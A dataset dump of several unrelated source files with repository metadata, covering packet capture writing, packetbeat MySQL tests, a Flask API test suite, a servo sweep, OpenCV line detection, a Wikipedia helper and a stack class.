TCP(sport = pkt['TcpSrc'], dport = pkt['TcpDst'], \
flags = pkt['TcpFlags'], seq = pkt['TcpSeqNo'])/ \
Raw(load = '')
if 'TcpAckNo' in pkt:
scapy_pkt[TCP].ack = pkt['TcpAckNo']
else:
scapy_pkt[TCP].ack = 0
if 'TcpData' in pkt:
scapy_pkt[Raw].load = pkt['TcpData']
# Write the scapy packet to the pcap
scapy_pkt.time = ts
pcap.write(scapy_pkt)
# Report progress to the impatient user
rendered = rendered + 1
percent = 0
if (rendered % 1000) == 0:
percent = int((rendered * 100.0)/total_packets)
print('Wrote {} ({}%) of {} packets'.
format(rendered, percent, total_packets),
flush = True, end = '\r')
print('Finished writing {} packets '.format(total_packets),
flush = True)
#----------------------------------------------------------------------
if __name__ == '__main__':
main()
|
[
"vnetman@zoho.com"
] |
vnetman@zoho.com
|
f228d88fdc9ae6482911ca6591acb3efc095a7b3
|
4b45472571a0af88d8c313e07907c3993d2e1ed4
|
/tests/test_0017_mysql_long_result.py
|
8049dc3f138a652590ce2af077f8716ccf8c100d
|
[
"Apache-2.0"
] |
permissive
|
shengxinking/packetbeat
|
04957e90c2809545283f3f672c2b4bfb3c0b8f32
|
45a5a1dda2dc61b35f844d8cf638886c5bb4e7e9
|
refs/heads/master
| 2020-12-13T22:36:02.287309
| 2015-05-31T17:10:14
| 2015-05-31T17:10:14
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,829
|
py
|
from pbtests.packetbeat import TestCase
"""
Tests for trimming long results in mysql.
"""
class Test(TestCase):
def test_default_settings(self):
"""
Should store the entire rows but only
10 rows with default settings.
"""
self.render_config_template(
mysql_ports=[3306],
mysql_send_response=True
)
self.run_packetbeat(pcap="mysql_long_result.pcap")
objs = self.read_output()
assert len(objs) == 1
res = objs[0]
assert res["mysql.num_rows"] == 15
lines = res["response"].strip().split("\n")
assert len(lines) == 11 # 10 plus header
for line in lines[3:]:
print len(line)
assert len(line) == 261
def test_max_row_length(self):
"""
Should be able to cap the row length.
"""
self.render_config_template(
mysql_ports=[3306],
mysql_max_row_length=79,
mysql_send_response=True
)
self.run_packetbeat(pcap="mysql_long_result.pcap",
debug_selectors=["mysqldetailed"])
objs = self.read_output()
assert len(objs) == 1
res = objs[0]
assert res["mysql.num_rows"] == 15
lines = res["response"].strip().split("\n")
assert len(lines) == 11 # 10 plus header
for line in lines[3:]:
assert len(line) == 81 # 79 plus two separators
def test_max_rows(self):
"""
Should be able to cap the number of rows
"""
self.render_config_template(
mysql_ports=[3306],
mysql_max_row_length=79,
mysql_max_rows=5,
mysql_send_response=True
)
self.run_packetbeat(pcap="mysql_long_result.pcap",
debug_selectors=["mysqldetailed"])
objs = self.read_output()
assert len(objs) == 1
res = objs[0]
assert res["mysql.num_rows"] == 15
lines = res["response"].strip().split("\n")
assert len(lines) == 6 # 5 plus header
for line in lines[3:]:
assert len(line) == 81 # 79 plus two separators
def test_larger_max_rows(self):
"""
Should be able to cap the number of rows
"""
self.render_config_template(
mysql_ports=[3306],
mysql_max_rows=2000,
mysql_send_response=True
)
self.run_packetbeat(pcap="mysql_long_result.pcap",
debug_selectors=["mysqldetailed"])
objs = self.read_output()
assert len(objs) == 1
res = objs[0]
assert res["mysql.num_rows"] == 15
lines = res["response"].strip().split("\n")
assert len(lines) == 16 # 15 plus header
|
[
"tudor@packetbeat.com"
] |
tudor@packetbeat.com
|
8e42ad80805c71fb93cfaa671563d3067fafd033
|
485bcb12e904e440c9b836757736512e94838b78
|
/foobar.py
|
e5eb60254a77157ce3f7e8c4a44dda5d0ec491bc
|
[] |
no_license
|
pritikmshaw/Algorithms
|
4e869f696ea66508ba66a78b3bc9ced3f53b2d52
|
5686258f011a445b3232bdc9e1d1929fe317956b
|
refs/heads/master
| 2023-01-27T16:02:49.898331
| 2020-12-15T15:02:31
| 2020-12-15T15:02:31
| 300,283,685
| 0
| 0
| null | 2020-10-01T13:10:09
| 2020-10-01T13:10:08
| null |
UTF-8
|
Python
| false
| false
| 356
|
py
|
def solution(st):
st1 = ""
for i in st:
if (i>='a' and i<='z'):
a = ord(i)
b = chr(219-a)
st1 = st1 + b
else:
st1 = st1 + i
return st1
sol = solution("Yvzs! I xzm'g yvorvev Lzmxv olhg srh qly zg gsv xlolmb!!")
print(sol)
|
[
"shawavisek35@gmail.com"
] |
shawavisek35@gmail.com
|
f91d4bdb6e32a05f050fff3af586e91c7940fad6
|
e7c9aed76416f81a6a2d62606f18c8d9b18c44a3
|
/servo.py
|
d05e799bd3492242d87a4be4650c1e466fc8e3d0
|
[] |
no_license
|
NikodemBartnik/FollowBotV2
|
b31f4aa5ba4c53101b928635bc90b237991407f3
|
a237dcdb63b23033ff85cfe977e4fd4085eefff9
|
refs/heads/master
| 2022-12-07T23:39:08.335653
| 2020-08-28T13:27:39
| 2020-08-28T13:27:39
| 291,053,845
| 2
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 640
|
py
|
from fpioa_manager import fm, board_info
from machine import Timer,PWM
import time
fm.register(board_info.JTAG_TCK,fm.fpioa.GPIO0)
tim1 = Timer(Timer.TIMER0, Timer.CHANNEL0, mode=Timer.MODE_PWM)
ch1 = PWM(tim1, freq=50, duty=5, pin=board_info.JTAG_TCK)
tim2 = Timer(Timer.TIMER1, Timer.CHANNEL0, mode=Timer.MODE_PWM)
ch2 = PWM(tim2, freq=50, duty=5, pin=board_info.JTAG_TDI)
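# Sweep both servos from 0 to 180 degrees and back. At 50 Hz, a 5% duty cycle is a
# 1 ms pulse (roughly 0 degrees) and 10% is a 2 ms pulse (roughly 180 degrees), which
# is why the loops below compute duty values in the 5..10 range.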
while True:
for x in range(180):
duty = 5*(x/180)+5
ch1.duty(duty)
ch2.duty(duty)
time.sleep(0.02)
for x in range(180):
duty = 5*(1-(x/180))+5
ch1.duty(duty)
ch2.duty(duty)
time.sleep(0.02)
|
[
"nikodem.bartnik@gmail.com"
] |
nikodem.bartnik@gmail.com
|
2bbcb9ac2adbbeaab98aa9c2008c06bd85850641
|
c6d0cc1a2466debc8ab3bedaa784143478788472
|
/test_api_server.py
|
32c52722bdcda616b0edc173cc499c341c4ddcc0
|
[] |
no_license
|
kevinpeizner/infinote
|
222cb40863e8e62e1f9089ce866c44d673a1be0c
|
2f3530b8107698211c32f57539c20933a445a629
|
refs/heads/master
| 2021-01-21T13:52:42.284698
| 2016-05-07T09:10:43
| 2016-05-07T09:10:43
| 44,779,223
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 17,873
|
py
|
#!/usr/bin/env python
import os, json, unittest, base64
from datetime import datetime
from unittest.mock import MagicMock
from flask import Flask, jsonify
from flask.ext.testing import TestCase
from contextlib import suppress
from werkzeug.exceptions import NotFound, MethodNotAllowed
from werkzeug.routing import RequestRedirect
from app import infinote
from app.config import basedir, infinote_app, db
from app.infinote import ProcessException
from app.models import User, Job, RuntimeData, RuntimeDataException
class HelperTestCases(unittest.TestCase):
def setUp(self):
pass
def tearDown(self):
pass
def test_make_public_job(self):
uid = 1
jid = 1234
mock_ts = datetime.utcnow().timestamp()
mock_job = {
'id': 1234,
'v_id': 'abcd',
'label': 'mock_job',
'stage': 'init',
'prog': 0.00,
'link': 'http://somelink.com',
'timestamp': mock_ts
}
# case 1
infinote.runtime_data.getJob = MagicMock(return_value=None)
infinote.abort = MagicMock()
res = infinote._make_public_job(uid, jid)
infinote.abort.assert_called_with(404)
self.assertEqual({'error': 'Not found'}, res)
infinote.runtime_data.getJob.assert_called_once_with(uid, jid)
infinote.runtime_data.getJob.reset_mock()
# case 2
infinote.runtime_data.getJob = MagicMock(return_value=mock_job)
infinote.url_for = MagicMock(return_value='http://mock_job_link')
res = infinote._make_public_job(uid, jid)
expected = mock_job
expected['uri']='http://mock_job_link'
expected.pop('id')
self.assertEqual(expected, res)
infinote.runtime_data.getJob.assert_called_once_with(uid, jid)
def test_extract_v_id(self):
# case 1
expected = test_data = '11111111111'
res = infinote._extract_v_id(test_data)
self.assertEqual(expected, res)
# case 2
test_data = 'www.youtube.com/watch?v=11111111111'
res = infinote._extract_v_id(test_data)
self.assertEqual(expected, res)
# case 3
test_data = 'youtube.com/watch?v=11111111111'
res = infinote._extract_v_id(test_data)
self.assertEqual(expected, res)
# case 4
test_data = 'youtu.com/watch?v=11111111111'
res = infinote._extract_v_id(test_data)
self.assertIsNone(res)
# case 5
test_data = ''
res = infinote._extract_v_id(test_data)
self.assertIsNone(res)
    def test_spawn_job(self):
u = User('Tom', 'tom@email.com')
u.id = 1
link = 'www.youtube.com/watch?v=11111111111'
v_id = '11111111111'
# case 1a/1b - _extract_v_id fails
infinote._extract_v_id = MagicMock(return_value=None)
self.assertRaises(ProcessException, infinote._spawn_job, "Don't care", link)
infinote._extract_v_id.assert_called_once_with(link)
infinote._extract_v_id.reset_mock()
infinote._extract_v_id = MagicMock(return_value='2346')
self.assertRaises(ProcessException, infinote._spawn_job, "Don't care", link)
infinote._extract_v_id.assert_called_once_with(link)
infinote._extract_v_id.reset_mock()
# case 2 - createJob fails
infinote._extract_v_id = MagicMock(return_value=v_id)
infinote.runtime_data.createJob = MagicMock(side_effect=RuntimeDataException(400, 'mock_exception'))
self.assertRaises(ProcessException, infinote._spawn_job, u, link)
infinote.runtime_data.createJob.assert_called_once_with(u.id, v_id)
infinote._extract_v_id.assert_called_once_with(link)
infinote.runtime_data.createJob.reset_mock()
infinote._extract_v_id.reset_mock()
class APITestCases(TestCase):
tested_urls = set()
def create_app(self):
test_app = Flask(__name__)
test_app.config['TESTING']= True
test_app.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///' + os.path.join(basedir, '_test.db')
return test_app
@classmethod
def setUpClass(cls):
APITestCases.url_map = infinote_app.url_map
def setUp(self):
self.test_client = infinote_app.test_client()
db.create_all()
def tearDown(self):
db.session.remove()
db.drop_all()
def test_zzz_all_endpoints_tested(self):
self.skipTest('Finish implementing API tests first.')
expected_urls = set()
for rule in infinote.url_map.iter_rules():
expected_urls.add(str(rule))
#print(expected_urls)
self.assertSetEqual(expected_urls, APITestCases.tested_urls)
def _tested_endpoint(self, endpoint):
# http://werkzeug.pocoo.org/docs/0.11/routing/#werkzeug.routing.MapAdapter.match
# These exceptions are suppressed because they mean an endpoint matched a
# rule, but not the method or the url redirects. That's OK, we still
# matched the rule - so we don't care about the exception.
with suppress(MethodNotAllowed, RequestRedirect):
try:
rule, ignore_arg = APITestCases.url_map.bind('').match(endpoint, return_rule=True)
except NotFound as e:
self.assertTrue(False, "{} did not match any endpoint rules on our server.".format(endpoint))
#print("\n\tRule returned:\t", rule)
APITestCases.tested_urls.add(str(rule))
def _error_msg(self, method, endpoint):
return 'Is {} supported at {}?'.format(method, endpoint)
def _verify_methods(self, supported_methods, endpoint):
"""
Verify that the methods not supported for a given endpoint return 405 and
that methods that are supported do not return 405.
Args:
supported_methods -- frozenset of uppercase HTTP method strings.
endpoint -- a string representing an API endpoint.
"""
self.assertIsInstance(supported_methods, frozenset, 'supported_methods must be a frozenset of strings.')
if 'GET' in supported_methods:
resp = self.test_client.get(endpoint)
self.assertNotEqual(405, resp.status_code, self._error_msg('GET', endpoint))
else:
resp = self.test_client.get(endpoint)
self.assert405(resp, self._error_msg('GET', endpoint))
if 'HEAD' in supported_methods:
resp = self.test_client.head(endpoint)
self.assertNotEqual(405, resp.status_code, self._error_msg('HEAD', endpoint))
else:
resp = self.test_client.head(endpoint)
self.assert405(resp, self._error_msg('HEAD', endpoint))
if 'POST' in supported_methods:
resp = self.test_client.post(endpoint)
self.assertNotEqual(405, resp.status_code, self._error_msg('POST', endpoint))
else:
resp = self.test_client.post(endpoint)
self.assert405(resp, self._error_msg('POST', endpoint))
if 'PUT' in supported_methods:
resp = self.test_client.put(endpoint)
self.assertNotEqual(405, resp.status_code, self._error_msg('PUT', endpoint))
else:
resp = self.test_client.put(endpoint)
self.assert405(resp, self._error_msg('PUT', endpoint))
if 'DELETE' in supported_methods:
resp = self.test_client.delete(endpoint)
self.assertNotEqual(405, resp.status_code, self._error_msg('DELETE', endpoint))
else:
resp = self.test_client.delete(endpoint)
self.assert405(resp, self._error_msg('DELETE', endpoint))
if 'TRACE' in supported_methods:
resp = self.test_client.trace(endpoint)
self.assertNotEqual(405, resp.status_code, self._error_msg('TRACE', endpoint))
else:
resp = self.test_client.trace(endpoint)
self.assert405(resp, self._error_msg('TRACE', endpoint))
# Note what endpoint was tested.
self._tested_endpoint(endpoint)
def _get_json(self, resp):
"""
Decode and return the json reponse.
"""
return json.loads(resp.get_data().decode('ascii'))
def _gen_user(self, username):
"""
Based on a username string, generate a fake email, bogus password, and a new
User object. This new user object is then added to the test db. Returns User
object and the generated password.
Args:
username -- A username string.
"""
email = '{}@email.com'.format(username)
password = '{}_password'.format(username)
u = User(username, email)
u.hash_password(password)
db.session.add(u)
db.session.commit()
user = User.query.filter_by(username = username).first()
return user, password
def _gen_auth_header(self, username, password):
"""
Given a username and password, generate a HTTP Basic Auth header field.
Refer to:
https://tools.ietf.org/html/rfc2617
https://en.wikipedia.org/wiki/Basic_access_authentication#Client_side
Args:
username -- A username string.
password -- A password string.
"""
b = '{0}:{1}'.format(username, password).encode('utf-8')
return {'Authorization': 'Basic ' + base64.b64encode(b).decode('utf-8')}
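    # Illustrative example: _gen_auth_header('tom', 'secret') returns
    # {'Authorization': 'Basic dG9tOnNlY3JldA=='}, since the base64 encoding of
    # 'tom:secret' is 'dG9tOnNlY3JldA=='.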
# assumes _gen_user() has been called to add given user to the test db.
def _verify_credential_check(self, path, method, username, password, data=None):
"""
"""
expected_resp = {
'error': 'Unauthorized access'
}
        if method == 'GET':
# case 1 - no auth header
resp = self.test_client.get(path)
self.assert401(resp)
self.assertEqual('application/json', resp.mimetype)
self.assertEqual(expected_resp, self._get_json(resp))
# case 2 - incorrect password
header = self._gen_auth_header(username, 'incorrect')
resp = self.test_client.get(path, headers=header)
self.assert401(resp)
self.assertEqual('application/json', resp.mimetype)
self.assertEqual(expected_resp, self._get_json(resp))
# case 3 - incorrect username
header = self._gen_auth_header('incorrect', password)
resp = self.test_client.get(path, headers=header)
self.assert401(resp)
self.assertEqual('application/json', resp.mimetype)
self.assertEqual(expected_resp, self._get_json(resp))
# case 4 - happy path
header = self._gen_auth_header(username, password)
resp = self.test_client.get(path, headers=header)
# special case for get_job() endpoint. TODO: rethink
if resp.status_code != 404:
self.assert200(resp)
self.assertEqual('application/json', resp.mimetype)
# case 5 - Require AUTH header on every request.
resp = self.test_client.get(path)
self.assert401(resp)
self.assertEqual('application/json', resp.mimetype)
self.assertEqual(expected_resp, self._get_json(resp))
        elif method == 'POST':
# TODO
self.fail('TODO: not implemented yet!')
else:
self.fail('Unsupported HTTP method "{}"'.format(method))
def test_root_page(self):
"""
Minimal test of any endpoint WITHOUT any authentication.
Refer to:
_verify_methods()
This test verifies that only the HTTP methods specified are supported on the
given endpoint. This helps ensure that we don't accidentally respond to HTTP
methods unintentionally.
"""
endpoint = '/'
supported_methods = frozenset(('GET', 'HEAD'))
# Validate only specified methods are supported.
self._verify_methods(supported_methods, endpoint)
# resp is a flask.wrappers.Response object.
resp = self.test_client.get(endpoint)
self.assert200(resp)
self.assertEqual(b'Hello World!', resp.get_data())
self.assertEqual('text/html', resp.mimetype)
def test_index_page(self):
"""
Minimal test of any endpoint WITHOUT any authentication.
Refer to:
test_root_page()
"""
endpoint = '/index'
supported_methods = frozenset(('GET', 'HEAD'))
# Validate only specified methods are supported.
self._verify_methods(supported_methods, endpoint)
# resp is a flask.wrappers.Response object.
resp = self.test_client.get(endpoint)
self.assert200(resp)
self.assertEqual(b'Hello World!', resp.get_data())
self.assertEqual('text/html', resp.mimetype)
def test_auth_page(self):
"""
Minimal testing of Basic Authentication mechanism.
Refer to:
test_root_page()
_gen_user()
_verify_credential_check()
_gen_auth_header()
We generate and add a user to the test db, then verify that a correct basic
auth header is required to access the endpoint.
"""
endpoint = '/infinote/api/v1.0/auth_test'
supported_methods = frozenset(('GET', 'HEAD'))
u, password = self._gen_user('Dan')
# Validate only specified methods are supported.
self._verify_methods(supported_methods, endpoint)
# Ensure this endpoint is protected.
self._verify_credential_check(endpoint, 'GET', u.username, password)
# resp is a flask.wrappers.Response object.
header = self._gen_auth_header(u.username, password)
resp = self.test_client.get(endpoint, headers=header)
self.assert200(resp)
self.assertEqual({'Result':'Auth Success! Got User Dan'}, self._get_json(resp))
self.assertEqual('application/json', resp.mimetype)
def _compare_jobs_response(self, expected, actual):
if not isinstance(expected, dict):
self.fail('Expected jobs response is not a dict.')
if not isinstance(actual, dict):
self.fail('Actual jobs response is not a dict.')
# match single key 'jobs'
self.assertEqual(expected.keys(), actual.keys())
# get jobs dictionaries
exp_jobs = expected['jobs']
jobs = actual['jobs']
# match job id keys
self.assertEqual(exp_jobs.keys(), jobs.keys())
# for each job, match each (k,v) pair.
for key, value in exp_jobs.items():
job = jobs[key]
for k, v in value.items():
if k == 'id':
k = 'uri'
v = 'http://' + str(infinote_app.config['HOST']) + \
':' + str(infinote_app.config['PORT']) + \
'/infinote/api/v1.0/jobs/' + str(v)
self.assertEqual(v, job[k])
def test_jobs_page_get_jobs(self):
"""
Test the retrieving of jobs for a user.
Refer to:
test_auth_page()
test_jobs_page_create_job()
Ensure that a well formatted json response is received and that it contains
all the jobs for a given user. POST method is tested in
test_jobs_page_create_job().
"""
endpoint = '/infinote/api/v1.0/jobs'
supported_methods = frozenset(('GET', 'HEAD', 'POST'))
u, password = self._gen_user('tom')
expected_resp = {
'jobs': {}
}
# Validate only specified methods are supported.
self._verify_methods(supported_methods, endpoint)
# Ensure this endpoint is protected.
self._verify_credential_check(endpoint, 'GET', u.username, password)
# case 1 - no jobs
header = self._gen_auth_header(u.username, password)
resp = self.test_client.get(endpoint, headers=header)
self.assert200(resp)
self.assertEqual('application/json', resp.mimetype)
self.assertEqual(expected_resp, self._get_json(resp))
# case 2 - two jobs
uid = 1
jid_1 = 1234
mock_ts_1 = datetime.utcnow().timestamp()
mock_job_1 = {
'id': jid_1,
'v_id': 'abcd',
'label': 'mock_job_1',
'stage': 'init',
'prog': 0.00,
'link': 'http://somelink.com',
'timestamp': mock_ts_1
}
jid_2 = 5678
mock_ts_2 = datetime.utcnow().timestamp()
mock_job_2 = {
'id': jid_2,
'v_id': 'efgh',
'label': 'mock_job_2',
'stage': 'done',
'prog': 1.00,
'link': 'http://somelink.com',
'timestamp': mock_ts_2
}
# prime runtime_data structure in infinote.
infinote.runtime_data.data = {uid:{jid_1:mock_job_1, jid_2:mock_job_2}}
expected_resp = {
'jobs':{str(jid_1):mock_job_1, str(jid_2):mock_job_2}
}
header = self._gen_auth_header(u.username, password)
resp = self.test_client.get(endpoint, headers=header)
self.assert200(resp)
self.assertEqual('application/json', resp.mimetype)
self._compare_jobs_response(expected_resp, self._get_json(resp))
def test_jobs_page_create_job(self):
"""
Test the creation of a new job for a user.
Refer to:
test_auth_page()
test_jobs_page_get_jobs()
Ensure that a well formatted json response is received and that it contains
the json detailing the new job for the given user. GET method is tested in
test_jobs_page_get_jobs().
"""
self.skipTest('Not yet.')
endpoint = '/infinote/api/v1.0/jobs'
supported_methods = frozenset(('GET', 'HEAD', 'POST'))
u, password = self._gen_user('tom')
expected_resp = {
'jobs': []
}
# Validate only specified methods are supported.
self._verify_methods(supported_methods, endpoint)
# Ensure this endpoint is protected.
self._verify_credential_check(endpoint, 'POST', u.username, password)
# case 1 - no jobs
header = self._gen_auth_header(u.username, password)
resp = self.test_client.get(endpoint, headers=header)
self.assert200(resp)
self.assertEqual('application/json', resp.mimetype)
self.assertEqual(expected_resp, self._get_json(resp))
def test_single_job_page(self):
endpoint = '/infinote/api/v1.0/jobs/0'
supported_methods = frozenset(('GET', 'HEAD', 'DELETE')) # TODO: revisit/refine
u, password = self._gen_user('tom')
# Validate only specified methods are supported.
self._verify_methods(supported_methods, endpoint)
# Ensure this endpoint is protected.
self._verify_credential_check(endpoint, 'GET', u.username, password)
# case 1 - no job
header = self._gen_auth_header(u.username, password)
resp = self.test_client.get(endpoint, headers=header)
self.assert404(resp)
self.assertEqual('application/json', resp.mimetype)
# self.assertEqual(expected_resp, self._get_json(resp))
def test_user_registration(self):
endpoint = '/infinote/api/v1.0/register'
supported_methods = frozenset(('POST',))
# Validate only specified methods are supported.
self._verify_methods(supported_methods, endpoint)
self._tested_endpoint(endpoint)
# case 1 - invalid data
resp = self.test_client.post(endpoint, data='hello')
self.assert400(resp)
if __name__ == '__main__':
unittest.main()
|
[
"kevin.peizner@gmail.com"
] |
kevin.peizner@gmail.com
|
8c7a45fa73c495255a631c06dbfbe0936b8dd4d8
|
fd4e4f5ace56f86191ef407d163d920e5364d0b4
|
/zsl/utils/text.py
|
a18029694e769afc098ea5f81b7adb3189f5e536
|
[] |
no_license
|
ChenWWWeixiang/zsl-pytorch
|
6f744ac8fb56daacc667fcedbac8d4edc2073c25
|
0961714b396189e90196be9272bc5876ec6fd21e
|
refs/heads/master
| 2022-04-15T08:45:27.105442
| 2020-04-02T11:18:06
| 2020-04-02T11:18:06
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,243
|
py
|
import string
import functools
import wikipedia
@functools.lru_cache(maxsize=200)
def wikipedia_description(search_term: str,
remove_punct: bool = False,
to_lower: bool = False,
**kwargs) -> str:
"""
Gets a description from wikipedia given a search term
This method adds extra functionality to `wikipedia.summary` function.
To learn more about it check: https://github.com/goldsmith/Wikipedia
Parameters
----------
search_term: str
Word or set of words to look for at wikipedia.
remove_punct: bool, default False
If set to true, the punctuation of the resulting description will be
removed
to_lower: bool, default False
If set to true, the description will be transformed to lowercase
kwargs: delegated parameters to `wikipedia.summary`
Returns
-------
str
Wikipedia description
"""
summary = wikipedia.summary(search_term, **kwargs)
if to_lower:
summary = summary.lower()
if remove_punct:
punct_set = set(string.punctuation)
summary = ''.join(' ' if o in punct_set else o for o in summary)
return summary
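# Illustrative usage (hits the live Wikipedia API, so the returned text will vary):
#   wikipedia_description('Zebra', sentences=1, remove_punct=True, to_lower=True)
# The extra `sentences` keyword is simply delegated to `wikipedia.summary`.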
|
[
"guillem.orellana@gmail.com"
] |
guillem.orellana@gmail.com
|
ec70d2b89d8107f3322a776f872a58936d9e6928
|
85db9d26afb8e2b5e5eac9f8173db2cb14f0d25c
|
/Morph_Text.py
|
ab988029a9c977706c737ae6ce88c1fe0e4071aa
|
[] |
no_license
|
kool7/Digit_Recognition_Using_OpenCV
|
890e980055c9cb9768353b0243cb34d274dfd77e
|
5e654c4f1bae97a6ccd523ffc5ee17a4f955badd
|
refs/heads/master
| 2021-04-10T23:42:40.467544
| 2020-04-18T13:15:00
| 2020-04-18T13:15:00
| 248,976,857
| 2
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,303
|
py
|
import cv2
import numpy as np
# Working on PNG images Only.
image = cv2.imread('plate/mh.png', cv2.IMREAD_UNCHANGED)
gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)
ret,binary = cv2.threshold(gray, 0, 255, cv2.THRESH_OTSU | cv2.THRESH_BINARY)
binary = cv2.bitwise_not(binary)
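# Second-order Sobel derivatives: H (dy=2) responds to horizontal lines, V (dx=2)
# to vertical lines; long runs of each are kept below as candidate grid lines.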
H = cv2.Sobel(binary, cv2.CV_8U, 0, 2)
V = cv2.Sobel(binary, cv2.CV_8U, 2, 0)
rows,cols = image.shape[:2]
contours, hierachy = cv2.findContours(V, cv2.RETR_LIST, cv2.CHAIN_APPROX_SIMPLE)
for cnt in contours:
(x,y,w,h) = cv2.boundingRect(cnt)
# rows/3 is the threshold for length of line
if h > rows/3:
cv2.drawContours(V, [cnt], -1, 255, -1)
cv2.drawContours(binary, [cnt], -1, 255, -1)
else:
cv2.drawContours(V, [cnt], -1, 0, -1)
contours, hierachy = cv2.findContours(H, cv2.RETR_LIST, cv2.CHAIN_APPROX_SIMPLE)
for cnt in contours:
(x,y,w,h) = cv2.boundingRect(cnt)
# cols/3 is the threshold for length of line
if w > cols/3:
cv2.drawContours(H, [cnt], -1, 255, -1)
cv2.drawContours(binary, [cnt], -1, 255, -1)
else:
cv2.drawContours(H, [cnt], -1, 0, -1)
kernel = cv2.getStructuringElement(shape=cv2.MORPH_RECT, ksize=(3,3))
H = cv2.morphologyEx(H, cv2.MORPH_DILATE, kernel,iterations = 3)
V = cv2.morphologyEx(V, cv2.MORPH_DILATE, kernel, iterations = 3)
cross = cv2.bitwise_and(H, V)
contours, hierachy = cv2.findContours(cross,cv2.RETR_LIST,cv2.CHAIN_APPROX_SIMPLE)
centroids = []
for cnt in contours:
mom = cv2.moments(cnt)
(x,y) = mom['m10']/mom['m00'], mom['m01']/mom['m00']
cv2.circle(image,(int(x),int(y)),4,(0,255,0),-1)
centroids.append((x,y))
centroids.sort(key = lambda x: x[0], reverse = False)
centroids.sort(key = lambda x: x[1], reverse = False)
dx = int(centroids[1][0] - centroids[0][0])
centroids = np.array(centroids, dtype = np.float32)
(x,y,w,h) = cv2.boundingRect(centroids)
if x-dx > -5: x = max(x-dx,0)
if h+dx <= rows+5: h = min(h+dx,rows)
if w+dx <= cols+5: w = min(w+dx,cols)
cv2.rectangle(image, (x,y), (x+w,y+h), (0,255,0))
roi = binary[y:y+h,x:x+w]
roi = cv2.morphologyEx(roi, cv2.MORPH_OPEN, kernel,iterations = 1)
cv2.imshow('image', image)
cv2.imshow('roi', roi)
cv2.waitKey(0)
cv2.destroyAllWindows()
|
[
"noreply@github.com"
] |
kool7.noreply@github.com
|
1bf72ff07ec719e1207835f5f8cfc840672d40a7
|
f7b0814fffb191eb3d8209644649a2fbc3580f27
|
/testraction.py
|
a7e82672b1f8e594431609e943814642e09737ff
|
[] |
no_license
|
JulianKimmig/chemformatics
|
51bbf87d3440cd404a442f830fdff2f1446cd425
|
4b200fa1e8860b2d685f75b5de1afcc74e6a533f
|
refs/heads/master
| 2020-04-15T19:13:21.131241
| 2019-02-08T14:31:53
| 2019-02-08T14:31:53
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 96
|
py
|
# -*- coding: utf-8 -*-
"""
Created on Wed Jan 9 10:30:10 2019
@author: Julian Stobbe
"""
|
[
"flamel90@gmail.com"
] |
flamel90@gmail.com
|
2f2feff517c8c11a7a8c48bf20a7da017e4316e5
|
0e647273cffc1fb6cbd589fa3c7c277b221ba247
|
/configs/hpt-pretrain/pascal/no_basetrain/100000-iters.py
|
2fc7e342ce4e0fa096acea278c7d0760030a4228
|
[
"Apache-2.0"
] |
permissive
|
Berkeley-Data/OpenSelfSup
|
e9976bf011b69ebf918506ba184f464b1073ec13
|
221191b88d891de57725b149caf237ffef72e529
|
refs/heads/master
| 2023-05-12T07:34:52.268476
| 2021-04-08T00:58:37
| 2021-04-08T00:58:37
| 343,654,823
| 0
| 1
|
Apache-2.0
| 2021-04-08T00:58:37
| 2021-03-02T05:20:27
|
Python
|
UTF-8
|
Python
| false
| false
| 202
|
py
|
_base_="../base-pascal-config.py"
# this will merge with the parent
# epoch related
total_iters=100000
checkpoint_config = dict(interval=total_iters)
checkpoint_config = dict(interval=total_iters//2)
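# NOTE: the second assignment above overrides the first, so checkpoints are
# written every total_iters // 2 = 50,000 iterations.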
|
[
"taeil.goh@gmail.com"
] |
taeil.goh@gmail.com
|
86b8c02212495351487f2f5621118666a4b71023
|
d09b5fe877f351eafd00c26c844ec366855359ab
|
/Chapter-3/3_set_of_stacks.py
|
795418acb469d99f425012a13c9aa047414fe172
|
[] |
no_license
|
viveksyngh/CTCI-6th-Edition-Python-Solution
|
c788bfdb9d94e70f9c59ee218f5cccac9304f7fb
|
6c4c9a09418e3b5e75355b68f85c3a4077b835e5
|
refs/heads/master
| 2022-10-23T21:41:54.295719
| 2022-10-09T10:55:12
| 2022-10-09T10:55:12
| 73,009,966
| 3
| 3
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 888
|
py
|
# Set of Stacks
class Stack(object):
def __init__(self):
self.items = []
def push(self, item):
self.items.append(item)
def pop(self):
if not self.items:
raise IndexError("Stack in empty")
return self.items.pop()
def peek(self):
return self.items[-1]
def size(self):
return len(self.items)
def is_empty(self):
return not bool(self.items)
class SetOfStack(object):
def __init__(self, capacity):
self.capacity = capacity
self.stacks = []
def push(self, item):
        if not self.stacks or self.stacks[-1].size() == self.capacity:
            new_stack = Stack()
            new_stack.push(item)
            self.stacks.append(new_stack)
else:
top_stack = self.stacks[-1]
top_stack.push(item)
def pop(self):
if not self.stacks:
raise IndexError("Stack is empty.")
top_stack = self.stacks[-1]
        popped_item = top_stack.pop()
        if top_stack.size() == 0:
            self.stacks.pop()
        return popped_item
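# Illustrative usage (hypothetical, not part of the original file):
#   stacks = SetOfStack(capacity=2)
#   for n in (1, 2, 3):
#       stacks.push(n)   # the third push starts a new internal Stack
#   assert stacks.pop() == 3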
|
[
"vivek@happay.in"
] |
vivek@happay.in
|
b97e8b57598f03a0b8337899d213846df07c12cc
|
8675eba922d0d1e53aa28d1dfd95b5ec64db46d0
|
/task1.py
|
c768c22a63aa8221c22140b3ecd7d69b52cc55ef
|
[] |
no_license
|
ilya-dychkov/cloud-computing
|
87bae3d4bde04526e8ac0c1ebbb0cfc4c9eb88eb
|
47a028fa76683bd9c6c80bbf413dd9a0809c67f2
|
refs/heads/master
| 2023-03-27T12:10:08.199647
| 2021-03-31T02:49:03
| 2021-03-31T02:49:03
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 104
|
py
|
def sum_elements(arr: list):
return sum(arr)
print(sum_elements([1, 2, 3, 4, 5, 6, 7, 8, 9, 10]))
|
[
"ilya.dychkov@gmail.com"
] |
ilya.dychkov@gmail.com
|
abdbb325934f65ffa36249b8d9974220e8175000
|
